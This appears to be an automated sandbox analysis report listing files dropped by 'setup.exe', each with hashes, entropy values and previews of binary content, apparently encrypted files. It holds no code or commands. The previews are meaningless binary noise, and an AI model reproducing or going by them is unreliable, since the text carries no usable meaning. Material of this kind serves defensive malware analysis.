              File Type:data
              Category:dropped
              Size (bytes):1398
              Entropy (8bit):7.855575543554447
              Encrypted:false
              SSDEEP:24:+FVfncLuXO9OfBA106SA2y5fbuHqx0AA0STOoAWr3hol0wyLUBC7mbD:+FVPc79O+jxuHqCzSod9E0p4lD
              MD5:AD10A1C547EE835F6C55C3FCDC8025E7
              SHA1:A5FB66D5AB4F0463C5CD85550FAA96C3A26748B5
              SHA-256:527CD96C793D496753C4982592D4F6D2A36A05C8222198605CE1D0FFB909C5AB
              SHA-512:1917052AF142B2D75345BF71A0244BF6A5E83C9F3DEFF42089B9C4ABE7504B805889654937F860A97B37992C6FBDBD539AFDB6047E98EC84FBF8829A223704E3
              Malicious:false
              Preview:<?xmlf......U.12.S.xhS.4.....U0r.X.9N.Z.OuV......jL.|.li....3$.].)....N...7..Y..a..:..hP...w..!D..|.cR...q.e.z...R..I0.....z:X.-.....0J]....*^.....c_...r..#..........Mq3 R..fb......./mz.".....&^..i..&:..w.okP.....n.An...&..5........N.t(..g.....8f.#.P.9.X.pY.P.0.....D-.|9 [O....d*~2.Z.....8u.%..wG.....V...X.0.".'.G...i......S~. .9.u..^.....RW.}..&.Eb..6F.S.7RK....O.E.rY...F#..P*.].x.Z...`....?.z......i.f.C.!....w)...A..n.%ojr.'_.1.....r.M.Ru.XW.<..........s..;O..eCV.b.}Z.]cW[.o...K ....j~.~@.......(..T..i..s........Qm....o1e..j.x....~!vTK..c..G.....n..L.Aq..AG...n...A~M..-.f....2.+g.....&.......L!Y....E...`)......)dJ..t6.....^......|0Y.M../=.*.~../...N.G=.-(+...C.).\.D....u.#...s.af6.'...n`.i.s.........#Wn..Ukc..../]..q..wy1n~..V`#...4p..w..I.5.....a&...41..;..g..= BY..tI.#....E.........\.Y.K.\X..c.:i.s....\..:..t.....w...]..j....&...,.u.^...J}#.. .....W-....e..hzHJh.p..O...c........e2..........|..hPc...%.&.=.M\.1.._U..p....2..y..~...S....V
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1008
              Entropy (8bit):7.798130650346315
              Encrypted:false
              SSDEEP:24:EGhFsHqm5799saK/Eh2a41YwdbjfuTgx3AbD:hhCKmp99Dya4tZmTA3aD
              MD5:B0ADDA007884FCE699128ED50FEEAB0B
              SHA1:4AEBF03113FD27AE855678026AA9D25351020E0A
              SHA-256:8C77278DDA4FBD14AC3B717F9F4AC4181FF34804C7C3894AD607E8F5D0CF2884
              SHA-512:9A444E46E40090045D118C844A1A55DA9387997F23B89ED7FD8109E42A7830ABB7567414ADDCA9C2C2BF8448D6C63BD9B01DF7AAB8BF3D20659120752EC663A6
              Malicious:false
              Preview:<?xml'9Z.....1.;.T&.U....A..2../7P.x.E..I.....;. E.MH.....h.......g:...]"..S.."(R.L..eo9gM.k.F.......?..H..a...*.:....#.t.)......F9.......|R..U...I.=.K.a......,.P..zH..5&..92Z.,..0a..M/Z.A..`.....z.tG.9..h.\..w....u.P.1c...d_..|..=./...x"...!.-..):...1...q...^...@]...y..;.....D|./.h-/W...R..}~.U.m.3?_^...W......O.m9.,V.......-_.s..T..w..Vx1..>.q.V|Wf.?..... ..S....&.VR.a......{..K..9!..0....g.x1:]..}8..CLy..S.F.XI..Ar...)wpA..\.Dx.t*.7.p....o7.*.$..W.....o..MZ.b.!..8|..&1.w....@n.X.|......u..........%.......tf5..F.......?..!..K..xN...e5y......A.i...h..oy6iV..g..U...89...1...W~.%,:.....6.m.sH..:.ee.A-1;Z..9p...0.Q....2.[..I.......a.W.I....W....8......<L.{.p.......m..4Wq.....)0x..p....@..Z%..D .cD...IXWr..pbS.'EQ6.*\.2.9..S.._.<c1..Y...0...;....R!8.\..Jj......|....Q...=...J..(...'<........weJ+je......7._.....^...Ci...Q.qUo..a...3!....b..+...d..8'..`.p.W..=T])Mq.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.676547391939826
              Encrypted:false
              SSDEEP:12:O7AsUkju7MVgFBOWjZ29poLe3eLRjkesxBMXuUoEdWZDuVxMzee7b9uC8FsgQsMS:O7AdIyOWNUoLe3eVjkzxeXunDcMz19u/
              MD5:2775337FEE519B1C086B310213424627
              SHA1:CD34583541ACA48C7402CB82A233B4788552B5C6
              SHA-256:BB5A4A8C7B62A2914D98A27BD29201A779F21D8AD5A3FDED0B80FED4B1229559
              SHA-512:F463A837D17990D3FAB2E4862B27A42895F4DEAB6FE157D9621CE9F697A643849A371A577EF8057B1C2259FC95A94E2E6F1BE05A44FDD797E263AA969037509A
              Malicious:false
              Preview:<?xml4...%S.M..EV..^K........P....'Czy79)..........x..n.b..;.B. ..hp... .J..)....).5.p..,..........=\...N."!3.8.2...p.......g..q}.:{..5.O..i.8./w,.....I%.S.....*....3Nq..."_N.0m....V..._y....Z.e.|.G....:.}....s.v.b.08.-.N..pq...C..Pw#.......}.s....S.~...pp.........5..l..d.....3z.4s..{..)x.R.'..C2..k..x..^.0.S.#....w..|.[2.o.N.P.i{..O...;.(.....IA."K>).[....:...."\...H.7..1.M.......]z...._...M.....e.I}.B....4.......Fi.]....?..56L[....f./..Bd4.0.\.O..K....".V..<..^O...t.oK...../....<.v.p....x.\.......|.#?W.....i4j.w..q.?....O..Z.?2I..x...N\y....b.7..oN...../...Y&.9......MK.6.,=....`%."t...`......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):793
              Entropy (8bit):7.691496773113602
              Encrypted:false
              SSDEEP:12:CDha7L7YdaOghodwSIXMc1o0e3Zlij1a/54OLy7P4bodTVGaDdyjKaB8NuCsMR2X:Cc7YMrodwlMci14o67rds4yjKaB0ujbD
              MD5:29F4850CB03935F77E09F83C54074AD5
              SHA1:4667F90C4A3C08E3F112532932096A5D4BDDFB6D
              SHA-256:728EF21B96797A6A67D9FC7FC079459C1D44ACAC80696E3777B2C611CFDD3E80
              SHA-512:ED71F1E472094E65BE84764F7586F178AFE7D27D38A25AA7C4A2054356C77334A50B8B929407CFF8E6A112954B630C05183FECBE2513A2035388F52CC1FF2645
              Malicious:false
              Preview:<?xml..0..P7..q..S....k<1.....T.....u.e.JV.<F......=..y..}M.*0.h3.s.3;sD....v.5OI.*P..Td....6.K!.V...n.8R.....z...?.o.....C....x.)V0..c.`.ql.V...7....,n.0.).k.).....w.:s........S..ky.Ff\.<'...w..H.,......D..........p...]...9.z......|... .8..... .@.p.....|....pQpt...h.`k-......{....V..0W.6..l...6F..F..E=s...]..<2Z.......r<.....:.F.DkRD...M4..G...L....j.0.W...........=F.[........+.:<|...b.6.... n@.0..t..mX...N9...W6.......e,.6.......m6.zFF....._|CM.Q.h..^.:....`. ^J@.'rN{....u.s}....G.0...1.E].5...M..V*...LA....5....c..3J.K...x...l.[/.B.l....L.~...g..V.k>.T...............ay.'b...e..u.7dx...R.e1..s.1p...H.B.K. 7._,l..Q.SVd..u.-.E....{!.... I..$...;......;.*X...:m8.*.....O.XVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):761
              Entropy (8bit):7.713100898253858
              Encrypted:false
              SSDEEP:12:SfX4KzOpIfdVFCKCVgvpVesEtENCrqDZyq8MR9vPzG4mg528+kUtvcot6OJ80/In:ktnf1JCWpmENCrqfrrK4mgV+ZUot6q/A
              MD5:F83054D2C6D7F6C7C1661F7D00593A00
              SHA1:61B14431AC5342C9E6F4915EC403873F44956051
              SHA-256:94BC24D6D55B4E7198699E5AEFE1613A74D3F667208ED4F5CCA1BFA33DC3E36A
              SHA-512:25A73D89627BB3A5C74F5162E7B2D274C84970DCEFE6CE39B7EB6FDD6EE468AF957A6DDD37198D3D7F69833CD2DB230CB0C3C5AD96ECC8AB0C2BD8EBEE8E1016
              Malicious:false
              Preview:<?xml.S.6....6Q.Q....u...nsy..?O...%....To.N....h..@.......?.(1....%...5sm.Q@......H%!.{..N6I....K%.iS.XL*.,....z|.`G..m.......o..TD.....s.t......C...~uO..l0.uJZe....a....n......4.z...S........h...6..m5O..]#."9..n..F...:...}=..l...0Er.I..Hs..7!....v..*,]W.......VK.%...$.6.[.a....@1.......p..P.wC..*U..IH...H..G.k..\[.8W.w.r!.x..'.....P...v.).....$2~9?.....%..`5...H.w....+l..x.:...P.....a..........g."..k.*..M-c.@...~m.5..H,..c..6..a.0;.g....!.........9X...n.l 5.XP...).....{w...P.....;e.7....k..z~+.....Ynl..N...8-..SG.CW..v..b.........L.v..f...k..q..,T......59..B_P...p.$..J/z.;.@>..S..2'..k..n.j...KJy...3mI..:.Wd..[L...p..j.....%.....B4X90..,.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1306
              Entropy (8bit):7.860314019805247
              Encrypted:false
              SSDEEP:24:195+khOpon2PMeNpmiAF5hEuD1uRS9lDpj1iy2NDDXd/6lqIOV+bD:19H5n2UHFL5AorDpj1RK6QIOV8D
              MD5:47632D69EDF6D951A057079F5A863E7D
              SHA1:2D816CFF119BF47BD72299E73A09DDD0C56175B4
              SHA-256:D9B8712C9FA9E51A65D4BF0BFBECBE741D29BFDA90BDC67D2ACC467FE36B959C
              SHA-512:716953CC61B3F680FDB2158B6BF6ABE95AEFE85D6148825BA3C2E774B5CEDA8829429485C4884073509B804D1A16451A390ACD514E71A33391D517C97680B530
              Malicious:false
              Preview:<?xml......N5.|..t.K.........]....}F.?.....\Jd.-..`F.^..rw..D.?.n1/.M..*........2[E.1.........tXU.~....)..._.=...n...)..e../.[..A.y.X-At.....#T.y..'.C)..H...x..k..\s.sO.A.].].Vf6.......)ARB.5....Xo.^..S...,9i....6.j.....+l.3....C;...?........W...Y.2.I.D.V..SXE!.Q.Q.......&A..".......^.W#>.9.mQE...\.)-.W.j..C.{...&..f......c._....."....U..`.....-..........m.`....r.$..#7.g...(5$.......j...5..-.=P_..?L.8...8..TCE...t.0.Q.z.z.2......f.xQ(KE...,..@...l$..yr.....bs./.~..~tl....tm....uzx7..^..>..oN=WS.u...B..).`k..2...O.n...f...y.*.W.;.b.|.B*......&[..3.&./.j..F..<..C#RW...Z9V.p..>"9}.K.Y68d$.g..)f..G....G.g...w.q.....f..l.}..,I....l...b..|......d_\.0....c.3.$..g.ae`k..h.......c......[a...r_.....4....>.#......-...5$...CF_.\0'..^r....{G$.\...M*.....g..T...(.A..p^.'.'=.)5..T?..k.,....c.`......q...i..C.....(.N_p......Jc....pb.:..M....|..8....n.!..l.q.......X.{....u...\.YE+.B....%.5.._..".pT..9.P7..VK.y..b.^..!.~j/.sG.v..Jk.....~-.../..)...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4285
              Entropy (8bit):7.950742617144995
              Encrypted:false
              SSDEEP:96:RruTSWmdePpK6zUccJtQGAkr/ZflGdrnLtQsB9p7ghbzng1w:BH6g3pL1lGdTBf7obbg1w
              MD5:F035818F3AC132AB2B754B62AD587D3A
              SHA1:2E264B7AA1DB75468C408A828BF19070824BD484
              SHA-256:4F1A171E6D7A8CE78B042E1DE5E57F85441AB687D1DA6601ADEBC27E3D23452A
              SHA-512:C400FF2DAE863C531DB4E91032E662E3AFEAB4A5D6580D00C7D61B4AA0052782995173CEF65E975BA36E31C33FEB8C9119D1E6F6558A9D46506E7F95AE6CE007
              Malicious:false
              Preview:<?xml$v.,P..LI..0|..y...`3.(.......e;.....^...b...y......v5.....*L....d%*.v.].p'..Mn[T.,......EAd..7.;...C.._?..D..a.{|...-...YP.[...o.YI,r..J.e.....1j.....|.ev.)!6..Hj.=........7..$..!...f....G..2......-V....o...U..3)"[..^..s...d./.C...v.Z...q|<....0.....(.Z..]Q........(....!z..<..&R.beP..2.CZ..}..S.Kd..........9.I1.C..v.....!._z..o...5u.....`*.._;MU.....x.........~W...Pf.[........G..k..K.g."....C......... .}.]w....").8Q..1[.....v.d.=.)&.1.!...Wx.[.>McP4..8/r..mR..........".*......7...Q_p.P.(..;.v.E...S7..b.H..)p.7....?..F;.B;5.'.F9..MNJ..FX..vGO5..l.@...=... .y.<........&....5..\..D........U'.<.=.Q...9.?.N..KB....D...n..U....w.k#.#..1..6.O....2.....,u..Y... [..`.'Q...../.J..g..L.S..&..i...9C...&.FxS[}....g..i.)q..2.....I_....._...H..T.Tw..wh...... .ru.-E.....\)..+ib.S...@..j."[$.........Y^sJ....5.f..f._...iS9...|.........J.!6..O.-."....4.BL(ycI./Y=.Q2.S.=.|.yB..-..>.b..k...[#..KR.iwj.#.;6....l...X....._O+]....(I..'..X...Z../.l+.}.j.X..~.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):854
              Entropy (8bit):7.7680282273924774
              Encrypted:false
              SSDEEP:24:EPtMXzqzwGEgxmy5bdsLVC7jkuCg3iD3KVTmYbD:EPYzqNEgxF5bdsLVCPTs3KVyCD
              MD5:79F805FE9788AC94A4158CB1B0A8BF40
              SHA1:AD9F4DECF6A5A3192236C99BD08B761CD1338841
              SHA-256:D00E4D440B0BFE9A16DBCA51161FA43D7F5A0C0A9E940C78169A1BAF497AC1AC
              SHA-512:D4F28EF1A6E60124EC946AC8FAFE8456D0B1DC060802D9BE891A6C16E224D8215C1B8CC86369EE1A8CDC15B1C59DC0A4518713ED7AAA12470A763A3CE220797E
              Malicious:false
              Preview:<?xml.S .&..F\.{1....pQ.?...G.._.....{.^.h(Z..b.p..~...t^*r(......H.v.]....pk..Y.c?.p.^.w......z............fgY &....'....f...].(_8%.........vX.]m..l%1.......UA.....r.M...Jfj..m.TY.....8u.<.>...k...........R=...Y5.Y.].........%.Z.J....l...Pa,..MCU....b..Ou.v.K............... .....j..H$i.....dF..?{.f$i.'...'.G.k...n....]......JT...>.:....K..e.k.CL4...>.".D.H-1.9.WXH.......].P..A..c.%f.SQ1...%...J.....{...M...4..h.... F..\+.........F....h*...J..G..._Cc..Xf-........}..^i..*..W=...+c...\.Q .....}.%....Ez...M..H!6...'.s.....AF.t..E;...mN=iW).^.....o\..7....V.;.].rB[x....G3=..k.......X.V}.^........!hp...yn..]..F....}\H........".?...C6..D....^gi)f....*..p).........<.......P...4.......>.....|..r.O.Jk.Z...g.*.n.H....M......(.[........z.X.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):929
              Entropy (8bit):7.816874678927643
              Encrypted:false
              SSDEEP:12:A9+BHJZR93NT4jYsgrpGEmNeNExF3XBvGiWPB5GX7bWjjpDOa5ws8Z5BppWzJsMS:A9KHJpN0MBrprzC3RWPEUjpKaT25P7bD
              MD5:6742BF30CDA61A2532F785DB24784FC2
              SHA1:E621BCD9E0BC0B47895A5281295A0D8974EEA8EB
              SHA-256:C944F28BBE4324CADE05B0FFEFAAA4869F216EA6E8E8540EABE5FF445DDFDEB5
              SHA-512:E68F9564B7DCE28BD7D18638C4DA940CE7D5A145CD7CFBA781154FC1286978C1CBAB21119017704AA337753644F1428CD6AB54DEE0AE9BC1EF2816383C2D56F4
              Malicious:false
              Preview:<?xml_.....+O..6`dNb. }..a...v......g....p(.%......Et...s..^../.....4j.....@..5..... 3sou...|...g..}1$9.e.:.&.Ts&.."...;.L..TOA....wK.L...>....j-.6COk..[...QQ9..LC.0-.>-...O:..(%Z.e+!T.......8..z..z.[|>..e...M......x......c.....8t?....)eP}.......].?AC...Q.:[..l\#.jgPoV-.E,.Y...c.iu.3TW..=...;.w....>j9.h..hY.~.&...G.....]Pr/.2#..U.f..HLi.^...+t............&.......+...`.-.O.V./....@9..........xgm.QD...c....J.K...F..[}!..x,....R...H..!s.'..-.s.6..Y.*z.'........x.c%..GF..Q<...6.;.....Kf.L.\t1W*....tQJ.=FA....p.`..L....J.`.xUI...7..2...z.,s...z.....m=K-..S..V"m..U.#f..@6..Si.,..e......:._i...x....H..^.>.9v.zb......M.@B4..P.|..r].b.'w.F.....^"...(+.....B.O......-..:..,...[..6.-f./.....&......)....Q..&H...l.X.........t...4n..?.....<..=E...&.'..m...#..Y.4.K.i.M...........%.&X..v.:..[..s...<C.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):722
              Entropy (8bit):7.7001751514430135
              Encrypted:false
              SSDEEP:12:fMkXoBr+ZvUDo3WL5kSHQmLX6WVV+AFCuAs+Y6r5O3HMbusMR2cii9a:xXFb3WL5zbX1SGlEVwM/bD
              MD5:BC77F2235000048C86707A0656B41595
              SHA1:E3D937E1E56C00A76E01775E388E9D3E947E4D7E
              SHA-256:C45286CCDAE3F4BBA22C561B51D5E209A95B5D4A1E106DF972D6E39DCAE022DF
              SHA-512:A994FA3020D18AF11BEFC808D62F1BE38214F911168B53401A98059B69DA8B60EF4B5981DFC75D91EEE859A338895B6E10B18A7F71D418E759AFCFE7C630EA7D
              Malicious:false
              Preview:<?xml;.ta.t...4../,Q..+.`..g.2....l...'I.."q..z....:-6\u...@..[.../.Z.@..%........q.1>.c.....&6....l4......4eO.M.~<=l][...o....da)L.w..rK%.?.f..............1...R.9..}_$...8u.VnE.Ki.Y..E.k.R..K,.{.#...@.p...R...i.C.U..JW.!.....f.K\.P.CsL.....i .2b.~.x...G|..?B.{E..1......U......h.*u,.k....c......#.k..\...ig|.g,...t..P/.f?<.N....._.B...G.<.....S.....L...5.....QK...)kRJ..~.:s6..-W..y...q..+o.*.}.K.~.).n .<*...e....p..a.M............P....A...x.Q........qu!J.....<.|.b.3.......U..Hp...].-.O......M.A.M.;.Z...-.h.....6...V...P'j7y..b..M.XKJ.`.y.0c..iR..,/W.t|^....$..K:.P[{.w?q.:.....)2..`L........e.9i.RTe.3....vh~$?.i9.Z.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):935
              Entropy (8bit):7.787937847805749
              Encrypted:false
              SSDEEP:24:uo8lIbvOnee5TAoZDDPjNHngwj//jgnz510IpbD:uo82bWee53xAKXmJD
              MD5:D291C685120177BAFB53231A434A637A
              SHA1:8A8C3E76DEB4EA9E4C6A8D223B5E1DD65FB61096
              SHA-256:7AA4586496BEFAF99CD10BFD195DBA5E3C7A98A3992A5CA38EE59025516545F6
              SHA-512:76F4921804DFC47D69154A944FB46AEBC18A093453BC6D5B6948588F02D85B4229FCAD61DE025DDBF2701B998C02C7E5B310D079330A353AC917491068CEFD3A
              Malicious:false
              Preview:<?xml....).a2...`.._.1.b....<.G#.q...y..B...YR. ..T....4e.-..^}.!^8.Y]-<...$..fm.. wld-.;....n.....|1S..A..W........-~}.y...:.....H=+...VJc.{.mq.?.....L.@.....I.,v.Q}%4....=M.W...q.K.N.6..=.ov...OA.........<.H@......4."....s...F....<...!#.:d.mwJ{.......[?.......).F.\..O..|...Sv.n.1..#;.,...u.U....../....+.@&..?..?..&.n1v8-....x]...D.%.....Z8"..Kd..k.OE...j....x.6E.3N..p.^..m.U....SQe.29.8....=.8N.L...^......?Y..E.l.E.....L.n..v.._.|.F.Df...)9..E.;.{.U.....x...G..?...atdc...S.13..2.HW.l5...~.N..$vzb.....L../..~W..w..>.j.GJ..W.....mG.S#....1..}.38..g...C.8<d.).^.c.....l.I.|...4.....v....!..g-dCW......dW~E|.J.u.y;.7..........w..N5......-.n...z...6.....>+.o.......*&..a.._w......7..f'......^Hy...9B.{.....X...U"...5..?h.s..f.3S)}..d..Q..._.Z...bi......Du.l.o......f.........X.....5......W.*.o..s.VF....x..~..Q'..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1357
              Entropy (8bit):7.861733254542982
              Encrypted:false
              SSDEEP:24:LQE0Ad/ywOVczPOB3Gzrachsw+1NSnhT7Uo3SsyA3nRRkR1zobztJ5b1bbD:n0Ad6wOV4PC2fYAh7FT/n7fnRD
              MD5:C62192AE57D8252E26373BEAD4B2BE2B
              SHA1:52BF4D1EDE1D84B1059D65D36C90A0F046F1A5EF
              SHA-256:83AEB08F932836E5231B575DE3BD7C363D88B8A7D319B889375907971DF4103F
              SHA-512:FE18FE3BACABD3FB79E2EA41B76E9B0E5FAA0DA4A1ACD9B377402B104D62D50222994D4A1F7E9DBB24BDCF6030536CED61C92394DFEC6E06BDB1F68D44BDF7BD
              Malicious:false
              Preview:<?xml.j.k...C9[9...l..?.s!........P..j4.R{.F.1RS.<(5..e-p.E.X..p.RM..>.=.....G.....VJ..C........'6..._..XB.......u..O}..=...F.D.!K1...s4.Y.aM.8....<.=ubi_D....'U.%[..AM}.*....r.q/Nj...$.....d)d..`l.%]a..z.W_r.....V.\.*..a...P1..5.....q...,:..Z./...}..Q....Z....7.....3......R.U@y......qI...(.I.8....."r..~0*.2=![b.X.S(y.....,bE..V..%]2....+.......2..r3KHE.....,PK]?c.....m.S.......l|...'E_$c.}..............n.....K.l.X..+!.. .......qH.MT.z.<M..!..';...,.r .S$.".@L"..D..M.I5.P.%....".aQ;b>....A.6./..H%.........l.X%u.8:....}..W.[..(..E...>."..h...7XS........%.n.#..Ri.....vC..`be....P.%..zY3.&..!..3.&PB......f.4.Qa.sY..4..............^B.....8..Ed. ..M..{Sh.c&\..A..vr.&...u.[(e..O.0..t.L.)....<.\s.h.3.w.....Zq4.:...<.s...6..Jq...W..;{..2..x.....m.y..m..S...|."...v.|.....{2..............;.9.P....GR............~|....uT..U..<.........$...NV..F3...`{.OPf.o.c...;*D.#/.\..(...-^.i...z.O.W. ..uJ..M.V...r....;^..........?..Z.y`..:.pS..[x.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1024
              Entropy (8bit):7.775821637065375
              Encrypted:false
              SSDEEP:24:UCoMe7wNHWEqtYdud6SkwmnyIwfOBgOPaXr9N/MmrQqJbD:UCoM7tWFtYmZLgkujPgrbEmEqpD
              MD5:51316F23D032885F5969D0F7A7888AC1
              SHA1:6F4825E82A0D041192E73FA00368F034FAF6B073
              SHA-256:CDCA2CBAC2DB1EF4AC825D674377D69CDFAF75D548941ECF96052CF986FB51D9
              SHA-512:E3FD924202890575E5E01DB7EB07085F354095EA916B37859408DB4EF76824D737BB77ACB035DDA962891499CA4D0AF4F3C14E6EAD9AA249E7DC5E424B364568
              Malicious:false
              Preview:<?xmlc.......GNB..@,.4.mvNH47.#..#..nx.2.........^....rD!Y..._/|'......D.,...0..S%y..1{@.6.Y.>.}C...juC.X....?[.....@.ooU.La....U...i9.t.....&.}/m<..H..'GU.*f.....d....a.......]>W.....?C*mCs./4..c.U.r|r..sJ.)*..c.F.6....U..&.N.....:>n}..o.a.*.P.}.N."qh|...x_.n...n.!.@.q..4..%..l,.....<.i..|.T>Y...f..qp.o.K."...\k..xG.rw......T..A...NGS.G.p..E.Jm..d...dBq_......%GS}\.f..8{...M...d...a.qD#H...t.Y...'.=.xG....+.*S..T9.TRq.M.a.....f....oRhcG..\...'./..^..Y.....Il..C......S..t\...u.D30..y.Q.Xko ......H-.HA..N.d.T....X.G....r..L7...#..._Q.^.....}..5=..>..g...l.*....../}......0....bv.%'...O.k/.*$..6.F...hb.'.,.DO.0....nZ....GV.zF ....;...vu.\i...Z........+.N..To...\.+...Iuy.....3.V...`.po.+.pum..s..v.SA..l..k.E.......c..qlf...1.#..8z.1.;y&&.yP..8)y...U...?q.B...C....4.9...na.L&......;x=>..'...["[.B3......_..Gl.y..q...b.uj...(..I..D6.'....|.;.pT/i(.;.%.yW..B.8&0KA.......N.Q...d..A.j/OWVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):943
              Entropy (8bit):7.78442991827742
              Encrypted:false
              SSDEEP:12:apn9DuWsrwawTx/tM0o3r++zDW8RaRx/nKy4Lic8uM163znjEL55ICQdxrHSKUsI:amW2w3vf5Ky4Lnk73QdxDKnP9/xbD
              MD5:DC01C66C3EDC89D05C9E9CC1BA3AA11B
              SHA1:C59E2533B6366C2CA4B69D1B0F6DC28B777C72AB
              SHA-256:E6E3C09C37A67B347768AD4B8B60D7976C4E9B0228EFADDDB3FA911CFF83AC01
              SHA-512:F4B13CE8C0DF889E992CDD57CCB67A44090F5B80B15A542E50A7D58E1BA09983F9BF68EDF07886BECB83DAE5EACEB3C929C0D81C27B9D7353B879173AE4734C0
              Malicious:false
              Preview:<?xmlSWf...... @...\..a!~Q.V:........e..?0....(/."..ND=.3z{.A..."..Qr.su.._j.m....N...s..~.l.......v....`.td..Lc..;.0t..m..rK...........U..G..r*...7TG$.w..=....:3..s......p...i|....+.2..4(.../.&b.....h]1.. }.F.-.....K&[..].l7..E.7..xX..p.....Z.j%S.q.....M>M..w..=.`*....A.q...p......K...QN.5....NP.Os....n>~EK=.....h..|!....&.m.jR.PhX.Yc(l...D....N=L....7GN..b&/....^?.c.1*i!...2.....!.!0...~]..!. .&....3o.I...(.s3..u....X.m..h[..v,8W.|3i..(...t7Z^.y.J.h..=..`..||........&_..~....=yV.o.4.....l...(9TcS7...@....._...U^#.*P.>...........m..z..U...#....^Z.o..1c)@M6.\..2.j.h...U..`..|v.| .9..[.M..@..-.)..t:H..z..b. c.0.......j.../.....Q..[.W...1...Yo.....(.......s{..a.%..:.*...97.9......._'D.......A..(.(...V.7.=.....6.0X.`\...8..|..|E....k.....q.Yu.....:..q.-.....5.-I..zc=X.qm.2.!5.+...O.Xp[@..N..F.`f..&"Y.J~......Z..N5.q..C..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):806
              Entropy (8bit):7.736946639217771
              Encrypted:false
              SSDEEP:24:sXkUG1NrCDX9nj3pvN58YygwTre1lRz12zKZloly1bD:sXmCDX9rpl58Y1O8vXblD
              MD5:8C4B80EB1D85293229C4A200BE64870E
              SHA1:921BBB44E5B0DBF38C3CD35CF654C208892F7AB3
              SHA-256:7A730A7EFBDB7EE70A497856A841C98D957747F9A170B6BDF8239916AA1DEAC3
              SHA-512:9555F31AD81404A1FB3BCEC32E95FDDE5F1A11EB681921E5E0B1C4142C1969479434C969B872F7EF199C07F65535736B0402A364A4E66D7AB5EC4F6050A67A1C
              Malicious:false
              Preview:<?xml#...Q.Hn.+@h..MM....q.p......O.:Hin%.....^..c........_.o.Z',.W^u:.......j......S.Y..}MI..B..^s..4o$Bdc...J......5.fwM..-..}..~VL...0bJ.1.......*....v..j.y.a.\h.t..~..e...6.A....D4.V.@.].......G...|m.......yi..3...M........4..-R...T:...1...H..loX4....0.,=.R.[..e..0...:....Q.s..\+[Wg.f..yW..`G..P.b..L.f.....`/z..S.">.=1#....:WL......l..-...^}...bS-|.*.......c..U.....Z....tE.-.l..a.........\.G.H...-.=.i.8.R}.........9O.C.#*Ec...&.......E.f.k....:...i#..#..n.P........+..5.c.....b.PD..|.).mwA"A...flBreW.i..:....|.f\.#~.e....va{YQw.].C9.b...(.".&...C..`...t.O.,..$.....FV..*-....o}...OY.3cN=.........(..../luw.D^.;.\.V.s4.z./j.uk.N....2&...*g...b...~4........+.d7.m....>.n..N^.@.o.., hm.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1156
              Entropy (8bit):7.804046380806069
              Encrypted:false
              SSDEEP:24:v5e8zArZXhd6MH2Od8ZsRRIguGI8PGQtuXktlSs7zbD:vA8zArZXD6MWQ8CF2uftEsTD
              MD5:90B051FB4334B6AD5A7FED5F27512CF0
              SHA1:EA59E9C27B6F1BAA8C59A10FFE389BA70BF2DC5D
              SHA-256:504E6BC09B26546830194114B0F2D754E6C5287E6E603607BC6DBAF8E37AB684
              SHA-512:5830348508E244983AE1F02D229C2C5D23CA5526F3CF36AB70A07BAFBF11B03D60AE04965BB0556B3475D82719FB6D92410F579D6B7E39D616681C74DB133FCE
              Malicious:false
